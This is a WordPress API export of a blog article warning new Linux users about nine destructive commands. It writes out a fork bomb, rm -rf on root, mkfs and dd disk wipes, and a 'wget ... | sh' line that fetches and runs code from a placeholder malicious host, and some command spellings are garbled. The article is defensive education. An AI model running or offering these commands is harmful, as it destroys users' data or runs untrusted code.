{"id":22276,"date":"2023-09-29T21:01:00","date_gmt":"2023-09-29T13:01:00","guid":{"rendered":"https:\/\/www.hongkiat.com\/blog\/?p=22276"},"modified":"2023-10-05T12:30:03","modified_gmt":"2023-10-05T04:30:03","slug":"linux-commands-to-avoid","status":"publish","type":"post","link":"https:\/\/www.hongkiat.com\/blog\/linux-commands-to-avoid\/","title":{"rendered":"9 Dangerous Linux Commands You Should Avoid"},"content":{"rendered":"<p><strong>Linux shell\/terminal commands are very powerful,<\/strong> and just a simple command could lead to the deletion of a folder, files, or even the root folder.<\/p>\n<p>In some cases, Linux won\u2019t even ask you for confirmation; rather, it will execute the command right away, causing you to <strong>lose valuable data and information<\/strong> stored in these files and folders.<\/p>\n<p>It is common for people to post content on the web <strong>recommending that new Linux users execute these commands<\/strong>. This might seem like a joke to the person who posted the content, but it\u2019s no laughing matter for the person on the receiving end.<\/p>\n<p>We\u2019ve gathered some Linux commands that are quite harmful to your system to help you avoid them. Do keep in mind that they are indeed dangerous and <strong>can be altered in a variety of ways to produce new commands<\/strong> that inflict more damage.<\/p>\n<p>An important thing to note is that <strong>some of these commands are only dangerous if they are prefixed with <code>s<a href=\"https:\/\/www.hongkiat.com\/blog\/linux-command-sudo\/\"><\/a>udo<\/code> on Ubuntu<\/strong>. On other distributions of Linux, most of these given commands will be dangerous to execute as root.<\/p>\n<p>Take a look at the <strong>9 commands and codes you should avoid executing.<\/strong><\/p>\n<hr>\n<h2>1. Linux Fork Bomb Command <\/h2>\n<p><code>:(){ :|: & };:<\/code> also known as <strong><a href=\"https:\/\/www.hongkiat.com\/blog\/linux-fork-bomb-explained\/\">Fork Bomb<\/a><\/strong> is a denial-of-service attack against a Linux System. <code>:(){ :|: & };:<\/code> is a bash function. Once executed, <strong>it repeats itself multiple times until the system freezes<\/strong>.<\/p>\n<p>You can only get rid of it by restarting your system. So be careful when executing this command on your Linux shell.<\/p>\n<div class=\"ref-block ref-block--post\" id=\"ref-post-1\">\n\t\t\t\t\t<a href=\"https:\/\/www.hongkiat.com\/blog\/linux-fork-bomb-explained\/\" class=\"ref-block__link\" title=\"Read More: The Linux Fork Bomb Explained\" rel=\"bookmark\"><span class=\"screen-reader-text\">The Linux Fork Bomb Explained<\/span><\/a>\n<div class=\"ref-block__thumbnail img-thumb img-thumb--jumbo\" data-img='{ \"src\" : \"https:\/\/assets.hongkiat.com\/uploads\/thumbs\/250x160\/linux-fork-bomb-explained.jpg\" }'>\n\t\t\t\t\t\t\t<noscript>\n<style>.no-js #ref-block-post-68756 .ref-block__thumbnail { background-image: url(\"https:\/\/assets.hongkiat.com\/uploads\/thumbs\/250x160\/linux-fork-bomb-explained.jpg\"); }<\/style>\n<\/noscript>\n\t\t\t\t\t\t<\/div>\n<div class=\"ref-block__summary\">\n<h4 class=\"ref-title\">The Linux Fork Bomb Explained<\/h4>\n<p class=\"ref-description\">\n\t\t\t\t\t\tGet the lowdown on Linux fork bombs and learn how to safeguard your system.\t\t\t\t\t\t<span>Read more<\/span><\/p>\n<\/div>\n<\/div>\n<hr>\n<h2>2. mv folder\/dev\/null Command<\/h2>\n<p><code>mv folder\/dev\/null<\/code> is another risky command. <code>Dev\/null<\/code> or <code>null device<\/code> is <strong>a device file that discards all the data written on it but it reports that the writing operation is executed successfully<\/strong>. It is also known as <strong>bit bucked<\/strong> or <strong>black hole<\/strong>.<\/p>\n<div class=\"ref-block ref-block--post\" id=\"ref-post-2\">\n\t\t\t\t\t<a href=\"https:\/\/www.hongkiat.com\/blog\/linux-command-mv\/\" class=\"ref-block__link\" title=\"Read More: How to Use mv in Linux\" rel=\"bookmark\"><span class=\"screen-reader-text\">How to Use mv in Linux<\/span><\/a>\n<div class=\"ref-block__thumbnail img-thumb img-thumb--jumbo\" data-img='{ \"src\" : \"https:\/\/assets.hongkiat.com\/uploads\/thumbs\/250x160\/linux-command-mv.jpg\" }'>\n\t\t\t\t\t\t\t<noscript>\n<style>.no-js #ref-block-post-68048 .ref-block__thumbnail { background-image: url(\"https:\/\/assets.hongkiat.com\/uploads\/thumbs\/250x160\/linux-command-mv.jpg\"); }<\/style>\n<\/noscript>\n\t\t\t\t\t\t<\/div>\n<div class=\"ref-block__summary\">\n<h4 class=\"ref-title\">How to Use mv in Linux<\/h4>\n<p class=\"ref-description\">\n\t\t\t\t\t\tGet to know the mv command in Linux for relocating and renaming files.\t\t\t\t\t\t<span>Read more<\/span><\/p>\n<\/div>\n<\/div>\n<hr>\n<h2>3. rm -rf command<\/h2>\n<p><code>rm -rf<\/code> command is a fast way to <strong>delete a folder and its content<\/strong> in the Linux operating system. If you don\u2019t know how to use it properly then it can become very dangerous to the system. The most common combinations and options used with <code>rm-rf<\/code> command are listed below:<\/p>\n<ul>\n<li><code><a href=\"https:\/\/www.hongkiat.com\/blog\/linux-command-mv\/\">rm<\/a><\/code> command is used to delete the files in Linux system. <\/li>\n<li><code>rm -f<\/code> command removes read-only files in folder without prompting. <\/li>\n<li><code>rm -r<\/code> command deletes the content of a folder recursively. <\/li>\n<li><code>rm -d<\/code> command is used to remove an empty directory but it will refuse to remove directory if it is not empty. <\/li>\n<li><code>rm -rf\/<\/code> command is used for forced deletion (it deletes it even if it\u2019s write protected) of all the content in root directory and sub folders.<\/li>\n<li><code>rm -rf*<\/code> command is used for forced deletion of all the content in the current directory (directory you are currently working in) and sub folders. <\/li>\n<li><code>rm -rf.<\/code> command is used for forced deletion of all the content in the current folder and sub folders. The <code>rm -r.[^.]*<\/code> command can also be used.<\/li>\n<li><code>rm -i<\/code> command is used for removal of files and folders but a prompt will appear before removal.<\/li>\n<\/ul>\n<div class=\"ref-block ref-block--post\" id=\"ref-post-3\">\n\t\t\t\t\t<a href=\"https:\/\/www.hongkiat.com\/blog\/linux-command-rm-rmdir\/\" class=\"ref-block__link\" title=\"Read More: How to Delete Files and Folers in Linux\" rel=\"bookmark\"><span class=\"screen-reader-text\">How to Delete Files and Folers in Linux<\/span><\/a>\n<div class=\"ref-block__thumbnail img-thumb img-thumb--jumbo\" data-img='{ \"src\" : \"https:\/\/assets.hongkiat.com\/uploads\/thumbs\/250x160\/linux-command-rm-rmdir.jpg\" }'>\n\t\t\t\t\t\t\t<noscript>\n<style>.no-js #ref-block-post-59110 .ref-block__thumbnail { background-image: url(\"https:\/\/assets.hongkiat.com\/uploads\/thumbs\/250x160\/linux-command-rm-rmdir.jpg\"); }<\/style>\n<\/noscript>\n\t\t\t\t\t\t<\/div>\n<div class=\"ref-block__summary\">\n<h4 class=\"ref-title\">How to Delete Files and Folers in Linux<\/h4>\n<p class=\"ref-description\">\n\t\t\t\t\t\tClean up your Linux workspace effortlessly with the rm and rmdir commands.\t\t\t\t\t\t<span>Read more<\/span><\/p>\n<\/div>\n<\/div>\n<hr>\n<h2>4. mkfs command<\/h2>\n<p><code><a href=\"https:\/\/www.hongkiat.com\/blog\/linux-command-mkfs\/\">mkfs<\/a><\/code> can be a dangerous command for your Linux based system if you don\u2019t know its purpose. <strong>Anything written after the mkfs will be formatted and replaced by a blank Linux file system<\/strong>.<\/p>\n<p>All the commands mentioned below will format the hard drive and it requires administrator rights:<\/p>\n<ul>\n<li><code>mkfs<\/code><\/li>\n<li><code>mkfs.ext3<\/code><\/li>\n<li><code>mkfs.bfs<\/code><\/li>\n<li><code>mkfs.ext2<\/code><\/li>\n<li><code>mkfs.minix<\/code><\/li>\n<li><code>mkfs.msdos<\/code><\/li>\n<li><code>mkfs.reiserfs<\/code><\/li>\n<li><code>mkfs.vfat<\/code><\/li>\n<\/ul>\n<p>The command <code>mkfs.cramfs<\/code> will do the same thing as the above but it does not require administrator rights to execute.<\/p>\n<div class=\"ref-block ref-block--post\" id=\"ref-post-4\">\n\t\t\t\t\t<a href=\"https:\/\/www.hongkiat.com\/blog\/linux-command-mkfs\/\" class=\"ref-block__link\" title=\"Read More: How to Use mkfs in Linux\" rel=\"bookmark\"><span class=\"screen-reader-text\">How to Use mkfs in Linux<\/span><\/a>\n<div class=\"ref-block__thumbnail img-thumb img-thumb--jumbo\" data-img='{ \"src\" : \"https:\/\/assets.hongkiat.com\/uploads\/thumbs\/250x160\/linux-command-mkfs.jpg\" }'>\n\t\t\t\t\t\t\t<noscript>\n<style>.no-js #ref-block-post-68040 .ref-block__thumbnail { background-image: url(\"https:\/\/assets.hongkiat.com\/uploads\/thumbs\/250x160\/linux-command-mkfs.jpg\"); }<\/style>\n<\/noscript>\n\t\t\t\t\t\t<\/div>\n<div class=\"ref-block__summary\">\n<h4 class=\"ref-title\">How to Use mkfs in Linux<\/h4>\n<p class=\"ref-description\">\n\t\t\t\t\t\tLearn to create filesystems with mkfs in Linux, a vital command for storage management.\t\t\t\t\t\t<span>Read more<\/span><\/p>\n<\/div>\n<\/div>\n<hr>\n<h2>5. Tar Bomb<\/h2>\n<p>The <code><a href=\"https:\/\/www.hongkiat.com\/blog\/linux-command-tar\/\">tar<\/a><\/code> command is used for combining multiple files into a single file (archived file) in <code>.tar<\/code> format. A Tape Archive (Tar) bomb can be created with this command.<\/p>\n<p>It is <strong>an archive file which explodes into thousands or millions of files with names similar to the existing files into the current directory<\/strong> rather than into a new directory when untarred.<\/p>\n<p>You can avoid becoming a victim of a tar bomb by <strong>regularly creating a new protective directory whenever you receive a tar file<\/strong> and then moving the received tar file into this directory before untarring.<\/p>\n<p>If the tar file is indeed a tar bomb then you can simply remove the newly created directory to get rid of it. Another way to avoid the explosion of a tar bomb is via <strong>the <code>-t<\/code> option to list all of the content of a tar file<\/strong> to give you an idea of the type of content contained within the tar file.<\/p>\n<div class=\"ref-block ref-block--post\" id=\"ref-post-5\">\n\t\t\t\t\t<a href=\"https:\/\/www.hongkiat.com\/blog\/linux-command-tar\/\" class=\"ref-block__link\" title=\"Read More: How to Compress and Extract Files with TAR in Linux\" rel=\"bookmark\"><span class=\"screen-reader-text\">How to Compress and Extract Files with TAR in Linux<\/span><\/a>\n<div class=\"ref-block__thumbnail img-thumb img-thumb--jumbo\" data-img='{ \"src\" : \"https:\/\/assets.hongkiat.com\/uploads\/thumbs\/250x160\/linux-command-tar.jpg\" }'>\n\t\t\t\t\t\t\t<noscript>\n<style>.no-js #ref-block-post-59115 .ref-block__thumbnail { background-image: url(\"https:\/\/assets.hongkiat.com\/uploads\/thumbs\/250x160\/linux-command-tar.jpg\"); }<\/style>\n<\/noscript>\n\t\t\t\t\t\t<\/div>\n<div class=\"ref-block__summary\">\n<h4 class=\"ref-title\">How to Compress and Extract Files with TAR in Linux<\/h4>\n<p class=\"ref-description\">\n\t\t\t\t\t\tThe tar command stands for \"tape archive\" and the basic Unix command to archive files. By default the...\t\t\t\t\t\t<span>Read more<\/span><\/p>\n<\/div>\n<\/div>\n<hr>\n<h2>6. dd command<\/h2>\n<p>The <code><a href=\"https:\/\/www.hongkiat.com\/blog\/linux-command-dd\/\">dd<\/a><\/code> command is used to <strong>copy & convert hard disk partitions<\/strong>. However, it can turn out to be harmful if you specify the wrong destination.<\/p>\n<p>The command may be any one of these:<\/p>\n<ul>\n<li><code>dd if=\/dev\/hda of=\/dev\/hdb<\/code><\/li>\n<li><code>dd if=\/dev\/hda of=\/dev\/sdb<\/code><\/li>\n<li><code>dd if=something of=\/dev\/hda<\/code><\/li>\n<li><code>dd if=something of=\/dev\/sda<\/code><\/li>\n<\/ul>\n<p>The following command will zero out the whole primary hard drive: <code>dd if=\/dev\/zero of=\/dev\/had<\/code><\/p>\n<div class=\"ref-block ref-block--post\" id=\"ref-post-6\">\n\t\t\t\t\t<a href=\"https:\/\/www.hongkiat.com\/blog\/linux-command-dd\/\" class=\"ref-block__link\" title=\"Read More: How to Use dd in Linux\" rel=\"bookmark\"><span class=\"screen-reader-text\">How to Use dd in Linux<\/span><\/a>\n<div class=\"ref-block__thumbnail img-thumb img-thumb--jumbo\" data-img='{ \"src\" : \"https:\/\/assets.hongkiat.com\/uploads\/thumbs\/250x160\/linux-command-dd.jpg\" }'>\n\t\t\t\t\t\t\t<noscript>\n<style>.no-js #ref-block-post-68042 .ref-block__thumbnail { background-image: url(\"https:\/\/assets.hongkiat.com\/uploads\/thumbs\/250x160\/linux-command-dd.jpg\"); }<\/style>\n<\/noscript>\n\t\t\t\t\t\t<\/div>\n<div class=\"ref-block__summary\">\n<h4 class=\"ref-title\">How to Use dd in Linux<\/h4>\n<p class=\"ref-description\">\n\t\t\t\t\t\tThe dd Linux command is use for file conversion and copying. The name dd stands for 'Data Duplicator'...\t\t\t\t\t\t<span>Read more<\/span><\/p>\n<\/div>\n<\/div>\n<hr>\n<h2>7. Shell Script Code <\/h2>\n<p>Someone may victimize you by <strong>giving you the link to a shell script and endorsing you to download and execute it<\/strong>. The script may contain some malicious or dangerous code inside. The <strong>format of command<\/strong> may look like this: <code>wget http:\/\/some_malicious_source -O- | sh<\/code>. The <code><a href=\"https:\/\/www.hongkiat.com\/blog\/linux-command-wget\/\">wget<\/a><\/code> will download the script while the sh downloads the script execution.<\/p>\n<div class=\"ref-block ref-block--post\" id=\"ref-post-7\">\n\t\t\t\t\t<a href=\"https:\/\/www.hongkiat.com\/blog\/linux-command-wget\/\" class=\"ref-block__link\" title=\"Read More: How to Use wget in Linux\" rel=\"bookmark\"><span class=\"screen-reader-text\">How to Use wget in Linux<\/span><\/a>\n<div class=\"ref-block__thumbnail img-thumb img-thumb--jumbo\" data-img='{ \"src\" : \"https:\/\/assets.hongkiat.com\/uploads\/thumbs\/250x160\/linux-command-wget.jpg\" }'>\n\t\t\t\t\t\t\t<noscript>\n<style>.no-js #ref-block-post-68044 .ref-block__thumbnail { background-image: url(\"https:\/\/assets.hongkiat.com\/uploads\/thumbs\/250x160\/linux-command-wget.jpg\"); }<\/style>\n<\/noscript>\n\t\t\t\t\t\t<\/div>\n<div class=\"ref-block__summary\">\n<h4 class=\"ref-title\">How to Use wget in Linux<\/h4>\n<p class=\"ref-description\">\n\t\t\t\t\t\tLearn how to use wget in Linux to download files, websites, and more with ease.\t\t\t\t\t\t<span>Read more<\/span><\/p>\n<\/div>\n<\/div>\n<hr>\n<h2>8. Malicious Source Code<\/h2>\n<p>Someone gives you the source code and asks you to compile it. The code <strong>may appear to be a  normal code but in fact some malicious code is disguised in the large source code<\/strong> and it may cause harm to your system. To avoid being victimized by this kind of attack, <strong>only accept and compile your source code from  trustworthy sources<\/strong>.<\/p>\n<hr>\n<h2> 9. Decompression Bomb <\/h2>\n<p>You have received a compressed file and you are asked to extract this file which appears to be very small in size but may be a few KB. In fact, <strong>this small sized compressed file contains very highly compressed data<\/strong>.<\/p>\n<p>Once the file is decompressed, hundreds of GB of data is extracted which <strong>can fill up your hard drive<\/strong> to bring down the performance of your system. To avoid this situation, always remember to accept data from trustworthy sources.<\/p>","protected":false},"excerpt":{"rendered":"<p>Linux power users, beware of these commands that can wreak havoc.<\/p>\n","protected":false},"author":142,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[3397],"tags":[888,3316],"topic":[4521],"class_list":["entry-content","is-maxi"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v22.8 (Yoast SEO v27.4) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>9 Dangerous Linux Commands You Should Avoid - Hongkiat<\/title>\n<meta name=\"description\" content=\"Linux power users, beware of these commands that can wreak havoc.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.hongkiat.com\/blog\/linux-commands-to-avoid\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"9 Dangerous Linux Commands You Should Avoid\" \/>\n<meta property=\"og:description\" content=\"Linux power users, beware of these commands that can wreak havoc.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.hongkiat.com\/blog\/linux-commands-to-avoid\/\" \/>\n<meta property=\"og:site_name\" content=\"Hongkiat\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/hongkiatcom\" \/>\n<meta property=\"article:published_time\" content=\"2023-09-29T13:01:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-10-05T04:30:03+00:00\" \/>\n<meta name=\"author\" content=\"Fahad Khan\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Fahad_Khan_TE\" \/>\n<meta name=\"twitter:site\" content=\"@hongkiat\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Fahad Khan\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/linux-commands-to-avoid\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/linux-commands-to-avoid\\\/\"},\"author\":{\"name\":\"Fahad Khan\",\"@id\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/#\\\/schema\\\/person\\\/8a8e24e5b2bacac5562a799adba100ec\"},\"headline\":\"9 Dangerous Linux Commands You Should Avoid\",\"datePublished\":\"2023-09-29T13:01:00+00:00\",\"dateModified\":\"2023-10-05T04:30:03+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/linux-commands-to-avoid\\\/\"},\"wordCount\":984,\"commentCount\":17,\"publisher\":{\"@id\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/#organization\"},\"keywords\":[\"Linux\",\"Linux Commands\"],\"articleSection\":[\"Desktop\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/linux-commands-to-avoid\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/linux-commands-to-avoid\\\/\",\"url\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/linux-commands-to-avoid\\\/\",\"name\":\"9 Dangerous Linux Commands You Should Avoid - Hongkiat\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/#website\"},\"datePublished\":\"2023-09-29T13:01:00+00:00\",\"dateModified\":\"2023-10-05T04:30:03+00:00\",\"description\":\"Linux power users, beware of these commands that can wreak havoc.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/linux-commands-to-avoid\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/linux-commands-to-avoid\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/linux-commands-to-avoid\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"9 Dangerous Linux Commands You Should Avoid\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/\",\"name\":\"Hongkiat\",\"description\":\"Tech and Design Tips\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/#organization\",\"name\":\"Hongkiat.com\",\"url\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/wp-content\\\/uploads\\\/hkdc-logo-rect-yoast.jpg\",\"contentUrl\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/wp-content\\\/uploads\\\/hkdc-logo-rect-yoast.jpg\",\"width\":1200,\"height\":799,\"caption\":\"Hongkiat.com\"},\"image\":{\"@id\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/hongkiatcom\",\"https:\\\/\\\/x.com\\\/hongkiat\",\"https:\\\/\\\/www.pinterest.com\\\/hongkiat\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/#\\\/schema\\\/person\\\/8a8e24e5b2bacac5562a799adba100ec\",\"name\":\"Fahad Khan\",\"description\":\"Fahad Khan is a writer for Hongkiat.com. He is an energetic engineer and teacher with a love for stimulating technology and handy tools, apps and services.\",\"sameAs\":[\"https:\\\/\\\/x.com\\\/Fahad_Khan_TE\"],\"url\":\"https:\\\/\\\/www.hongkiat.com\\\/blog\\\/author\\\/fahad_khan\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"9 Dangerous Linux Commands You Should Avoid - Hongkiat","description":"Linux power users, beware of these commands that can wreak havoc.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.hongkiat.com\/blog\/linux-commands-to-avoid\/","og_locale":"en_US","og_type":"article","og_title":"9 Dangerous Linux Commands You Should Avoid","og_description":"Linux power users, beware of these commands that can wreak havoc.","og_url":"https:\/\/www.hongkiat.com\/blog\/linux-commands-to-avoid\/","og_site_name":"Hongkiat","article_publisher":"https:\/\/www.facebook.com\/hongkiatcom","article_published_time":"2023-09-29T13:01:00+00:00","article_modified_time":"2023-10-05T04:30:03+00:00","author":"Fahad Khan","twitter_card":"summary_large_image","twitter_creator":"@Fahad_Khan_TE","twitter_site":"@hongkiat","twitter_misc":{"Written by":"Fahad Khan","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.hongkiat.com\/blog\/linux-commands-to-avoid\/#article","isPartOf":{"@id":"https:\/\/www.hongkiat.com\/blog\/linux-commands-to-avoid\/"},"author":{"name":"Fahad Khan","@id":"https:\/\/www.hongkiat.com\/blog\/#\/schema\/person\/8a8e24e5b2bacac5562a799adba100ec"},"headline":"9 Dangerous Linux Commands You Should Avoid","datePublished":"2023-09-29T13:01:00+00:00","dateModified":"2023-10-05T04:30:03+00:00","mainEntityOfPage":{"@id":"https:\/\/www.hongkiat.com\/blog\/linux-commands-to-avoid\/"},"wordCount":984,"commentCount":17,"publisher":{"@id":"https:\/\/www.hongkiat.com\/blog\/#organization"},"keywords":["Linux","Linux Commands"],"articleSection":["Desktop"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.hongkiat.com\/blog\/linux-commands-to-avoid\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.hongkiat.com\/blog\/linux-commands-to-avoid\/","url":"https:\/\/www.hongkiat.com\/blog\/linux-commands-to-avoid\/","name":"9 Dangerous Linux Commands You Should Avoid - Hongkiat","isPartOf":{"@id":"https:\/\/www.hongkiat.com\/blog\/#website"},"datePublished":"2023-09-29T13:01:00+00:00","dateModified":"2023-10-05T04:30:03+00:00","description":"Linux power users, beware of these commands that can wreak havoc.","breadcrumb":{"@id":"https:\/\/www.hongkiat.com\/blog\/linux-commands-to-avoid\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.hongkiat.com\/blog\/linux-commands-to-avoid\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.hongkiat.com\/blog\/linux-commands-to-avoid\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.hongkiat.com\/blog\/"},{"@type":"ListItem","position":2,"name":"9 Dangerous Linux Commands You Should Avoid"}]},{"@type":"WebSite","@id":"https:\/\/www.hongkiat.com\/blog\/#website","url":"https:\/\/www.hongkiat.com\/blog\/","name":"Hongkiat","description":"Tech and Design Tips","publisher":{"@id":"https:\/\/www.hongkiat.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.hongkiat.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.hongkiat.com\/blog\/#organization","name":"Hongkiat.com","url":"https:\/\/www.hongkiat.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.hongkiat.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.hongkiat.com\/blog\/wp-content\/uploads\/hkdc-logo-rect-yoast.jpg","contentUrl":"https:\/\/www.hongkiat.com\/blog\/wp-content\/uploads\/hkdc-logo-rect-yoast.jpg","width":1200,"height":799,"caption":"Hongkiat.com"},"image":{"@id":"https:\/\/www.hongkiat.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/hongkiatcom","https:\/\/x.com\/hongkiat","https:\/\/www.pinterest.com\/hongkiat\/"]},{"@type":"Person","@id":"https:\/\/www.hongkiat.com\/blog\/#\/schema\/person\/8a8e24e5b2bacac5562a799adba100ec","name":"Fahad Khan","description":"Fahad Khan is a writer for Hongkiat.com. He is an energetic engineer and teacher with a love for stimulating technology and handy tools, apps and services.","sameAs":["https:\/\/x.com\/Fahad_Khan_TE"],"url":"https:\/\/www.hongkiat.com\/blog\/author\/fahad_khan\/"}]}},"jetpack_featured_media_url":"https:\/\/","jetpack_shortlink":"https:\/\/wp.me\/p4uxU-5Ni","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.hongkiat.com\/blog\/wp-json\/wp\/v2\/posts\/22276","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hongkiat.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hongkiat.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hongkiat.com\/blog\/wp-json\/wp\/v2\/users\/142"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hongkiat.com\/blog\/wp-json\/wp\/v2\/comments?post=22276"}],"version-history":[{"count":4,"href":"https:\/\/www.hongkiat.com\/blog\/wp-json\/wp\/v2\/posts\/22276\/revisions"}],"predecessor-version":[{"id":69705,"href":"https:\/\/www.hongkiat.com\/blog\/wp-json\/wp\/v2\/posts\/22276\/revisions\/69705"}],"wp:attachment":[{"href":"https:\/\/www.hongkiat.com\/blog\/wp-json\/wp\/v2\/media?parent=22276"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hongkiat.com\/blog\/wp-json\/wp\/v2\/categories?post=22276"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hongkiat.com\/blog\/wp-json\/wp\/v2\/tags?post=22276"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.hongkiat.com\/blog\/wp-json\/wp\/v2\/topic?post=22276"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}